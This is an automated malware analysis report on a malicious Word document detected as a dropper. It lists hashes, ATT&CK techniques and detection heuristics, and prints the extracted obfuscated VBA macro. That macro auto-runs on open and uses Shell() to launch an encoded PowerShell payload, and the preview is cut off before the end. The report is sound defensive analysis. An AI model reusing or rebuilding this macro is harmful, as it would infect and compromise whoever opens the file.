Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5a456666e5d2b621…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 89.8 KB
Created: 2018-06-13 09:32:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: e65fd4c3206fb6d0e3f12c834173be16
SHA-1: 7f2061a9e2c93751f97adad47f9edd9c545dca11
SHA-256: 5a456666e5d2b62113708f9be60fe30f83dbd2b8de9e47e790a9992fe3422305
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample contains VBA macros, specifically a Document_Open macro that calls the Shell() function to execute arbitrary commands. This indicates dropper or downloader functionality: the macro's purpose is to execute a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-7144261-0' further supports this assessment.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-7144261-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-7144261-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10869 bytes
SHA-256: 1a5235f0ba4261b7a6e817254cfbde55a1d89d44cb7cce6397dde59d76224c86

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "wkkPoMkDwwhA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function LbPtb()
On Error Resume Next
vfSmGp = CDbl(JssKOk)
bdECk = CRvDum
ZNqcLs = Tan(53260)
lNOTjY = CDbl(MHARBv * CDbl(WWlUB + Int(wDSiBu * Rnd(34407)) * XzHYr * Log(63184 * DuHPwO - BAmzA + Fix(51))))
JBDzv = wjbwMq
RIbvX = Tan(26622)
LwZYvz = CDbl(TVTiwj)
aFIFaU = OfjNqk
UqpuP = Tan(53129)
GlMXJI = CDbl(fdjOsT * CDbl(iCNiL + Int(jKMob * Rnd(17752)) * TKKBQ * Log(16597 * dYuIEq - Uffak + Fix(51))))
PpdsZ = rHunl
KHfNwF = Tan(1021)
wSjsjz = CDbl(ZOcJw)
czbGO = zbkhmj
IBTwzB = Tan(58329)
jooGkw = CDbl(sKEPG * CDbl(ADwJCw + Int(GmsWas * Rnd(30314)) * ilpnw * Log(85203 * bwiwiQ - LIooI + Fix(51))))
zVMEuw = LzcBwu
cVPloj = Tan(60619)
PaVih = CDbl(pZOcd)
PljmG = iYnrBr
vljTi = Tan(41295)
KnfCsr = CDbl(YfTLlt * CDbl(QmdHX + Int(OkRzVZ * Rnd(4924)) * KCprV * Log(15775 * dfiZz - WiaTs + Fix(51))))
tiiBE = SwltM
LjRrn = Tan(90854)
LbPtb = WdDQG + VBA.Shell(fFdBE + Chr(BEVYHHWZT + vbKeyP + vlwBhTRD) + "owers" + HATtNZQjm + jcFNl + zVRYTjNQbE + YdilpPNY, 14496 - 14496)
LdcUQ = CDbl(UjZpi)
aEGoWj = DYDZKz
sFbiYM = Tan(58170)
cWMwZV = CDbl(zkYZdE * CDbl(Biwku + Int(zRtki * Rnd(18089)) * bOKiu * Log(90016 * zvucDN - YOTZi + Fix(51))))
wswIz = GKcIGw
cRGadi = Tan(21879)
KRswr = CDbl(utICQ)
qawUL = czjZVc
wtvzzd = Tan(39065)
SnwnHr = CDbl(bdIDRU * CDbl(Lwwtiv + Int(wQoWO * Rnd(86362)) * IjOvPD * Log(96536 * XwYSD - zjOAmn + Fix(51))))
coSRH = tupoiv
IWmjK = Tan(66588)
End Function
Private Sub Document_open()
On Error Resume Next
fOzHd = CDbl(vZtaqR)
JaaSJ = FdQOin
PaYOAM = Tan(86481)
msWva = CDbl(GAVnlv * CDbl(tnHEa + Int(mqXsO * Rnd(33036)) * rhGuwT * Log(46238 * SMpus - JaIKb + Fix(51))))
dzMjfU = WEmGz
ELpTv = Tan(30920)
RBWck = CDbl(wCupi)
CqiqL = EizEh
TvhTi = Tan(724)
NFzzv = CDbl(iniOzR * CDbl(zLiQB + Int(FrLiWN * Rnd(72097)) * bttkhO * Log(57848 * USLwC - miMEv + Fix(51))))
bENhQ = MjjhT
aRJstk = Tan(51067)
LbPtb
ZJAsr = CDbl(NziHuR)
cMfvi = wtDtaN
wziGAf = Tan(62157)
imtWoF = CDbl(NZVNN * CDbl(AKTlY + Int(jPZlA * Rnd(58255)) * sWfSa * Log(92906 * snfXC - apLfLn + Fix(51))))
FjBMR = pamEDs
RRYZf = Tan(21713)
AKCwt = CDbl(OBLvvR)
iOJOzp = VIMTwR
wwviSj = Tan(32601)
zUkzK = CDbl(rkOVP * CDbl(fMKSHK + Int(zBzJhA * Rnd(33099)) * diDaU * Log(18552 * hwJsNz - fowOE + Fix(51))))
SiiiK = NqcYQ
QurYRv = Tan(30755)
End Sub


Attribute VB_Name = "inVIksYhlG"
Function HATtNZQjm()
On Error Resume Next
NiiXo = mzOzJ
okndSP = ivfTCo
BNnaN = Tan(30928)
ndjUcc = CDbl(duDPzH)
bUTwJ = CDbl(lCAzn * CDbl(KnQIFF + Int(vjznzV * Rnd(64403)) * HIzjqT * Log(85181 * lZiRU - mjnpr + Fix(51))))
BFtja = Tan(84326)
jhYVHbhwo = "He" + "LL" + " . ( $Env:cOmS" + "Pec[4" + ",15,25]-J" + "oIn" + "'')([St" + "riNG]::JOI" + "N( '" + "',('107"
XYJNv = MzlChH
FvEFGo = frfXsj
OvSwiW = Tan(3894)
VIcmY = CDbl(wjfFuB)
niFCYw = CDbl(pPhKz * CDbl(fjZhtW + Int(NRacQA * Rnd(44714)) * FjbQv * Log(81194 * LPTzb - PjXuJ + Fix(51))))
cvuUWW = Tan(50685)
TKTMwwF = "}35_36R5" + "3D22}13_" + "8t1" + "11D114R111~" + "33v42" + "}56v98R32%4" + "5H3"
ijBzS = ujDDkZ
QlCnhZ = WfASA
hjjFK = Tan(1306)
mEBmF = CDbl(jAKzW)
fqXJl = CDbl(apckGu * CDbl(MSmwuI + Int(HsmVWf * Rnd(41859)) * pRkjhz * Log(61933 * odzNT - oBwsD + Fix(51))))
ILmlz = Tan(89352)
aYZEqIELf = "7_42" + "_44v59" + "t111v61" + "~46R33v43" + "H32}34v116v1" + "07_21_36_3Y63v2" + "8H" + "11" + "1_114Y111v33}42" + "H56Y98D32t45}3"
abkYJ = mUibv
wtMnrt = nDiBZ
QvVKBj = Tan(55969)
straoJ = CDbl(bwIkc)
YjflQK = CDbl(UziTb * CDbl(dEStc + Int(whjmo * Rnd(20332)) * BuszZj * Log(99278 * DchUSU - MBLsL + Fix(51))))
cINGif = Tan(49674)
YKjYI = "7v42H44R59" + "Y11" + "1%28%54%6" + "0Y59%42~34_" + "97t1}42v59" + "Y97}24t" + "42H" + "45_1" + "2_35v38v42t33" + "t59Y116R107"
QGEJak = awMvC
BLjqu = LpkCCI
SjtRbd = Tan(29851)
bqHMqt = CDbl(lrHLYc)
YpTklr = CD
... (truncated)